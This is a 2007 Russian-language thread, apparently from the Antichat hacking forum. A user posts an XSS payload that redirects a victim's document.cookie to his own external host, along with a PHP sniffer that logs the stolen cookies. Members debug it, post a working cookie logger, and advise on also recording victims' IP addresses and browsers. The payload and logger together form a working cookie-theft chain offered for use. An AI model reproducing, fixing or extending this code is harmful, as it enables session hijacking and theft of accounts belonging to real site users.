ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нужна помощь. Видать в запросе...
  #1  
Старый 04.03.2007, 15:37
Аватар для int15
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
Cool Нужна помощь. Видать в запросе...

Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:
PHP код:
<script&qtdocument.location.href="http://www.humora.net.ru/Files/sniff.php"document.cookie; </script&qt
Где sniff.php содержит такие строки:
PHP код:
<?
 $f 
fopen("snif.txt""a");
 
fwrite($f$REQUEST_URI);
 
fclose($f);
 print(
"OK");
?&
qt;
И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBA IEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie
Подскажите че нетак, плиз, а то не знаю уже че за фигня
 
Ответить с цитированием

  #2  
Старый 04.03.2007, 16:53
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

у тя он записывает тока урл. Всё дело в сниффере. Ты пишешь:
http://www.humora.net.ru/Files/sniff.php+ document.cookie
И переходит на урл+куки.
 
Ответить с цитированием

  #3  
Старый 04.03.2007, 17:01
Аватар для TaNkist
TaNkist
Участник форума
Регистрация: 06.04.2006
Сообщений: 257
Провел на форуме:
367179

Репутация: 76
По умолчанию

Просто добавь знак вопроса:
http://www.humora.net.ru/Files/sniff.php?
В снифере замени $REQUEST_URI на "$QUERY_STRING \n"
 
Ответить с цитированием

  #4  
Старый 04.03.2007, 17:15
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

$_server['query_string']; лучше
 
Ответить с цитированием

  #5  
Старый 04.03.2007, 17:32
Аватар для int15
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
По умолчанию

Cпасибо Чето я и правду запарился) Щас буду пробовать
 
Ответить с цитированием

  #6  
Старый 04.03.2007, 17:38
Аватар для int15
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
По умолчанию

Хм.. Все сделал, поставил "?" теперь это выглядит так:
===
Parse error: syntax error, unexpected '?' in /var/www/user***/html/humora.net.ru/Files/sniff.php on line 6
===
тут код снифера:
===
<?
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?&qt;
===
туплю чето опять
 
Ответить с цитированием

  #7  
Старый 04.03.2007, 17:42
Аватар для int15
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
По умолчанию

аа все, уже не глючит , новый код:
===
<?php
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?>
===
 
Ответить с цитированием

  #8  
Старый 04.03.2007, 17:42
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

PHP код:
<?php
if($_SERVER['QUERY_STRING']){
    
$f fopen("log""a");
    
fwrite($f$_SERVER['QUERY_STRING']."\n\n");
    
fclose($f);
}
?>
 
Ответить с цитированием

  #9  
Старый 04.03.2007, 18:24
Аватар для int15
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
По умолчанию

а может вы мне поможете к этому сниферу какие нибудь фишки прикрутить
ну там чтобы он какую нибудь инфу о компе собирал, какой нето Ip-адрес, браузер или еще чего-нибудь по удобней ?
 
Ответить с цитированием

  #10  
Старый 08.03.2007, 14:47
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

тебе нужно тока версия браузера, урл и ип. Ничё лишнего. Ну можешь ещё сделать, чтоб одинаковые записи удалялись В иненте полно пхп-снифферов, даже на этом сайте есть выложенный где-то... Поиском пройдись
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужна помощь! Black_Death Болталка 7 11.12.2004 16:03
Нужна помощь... Чаты 2 24.02.2003 02:17
Нужна помощь Амир Чаты 0 04.09.2002 11:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ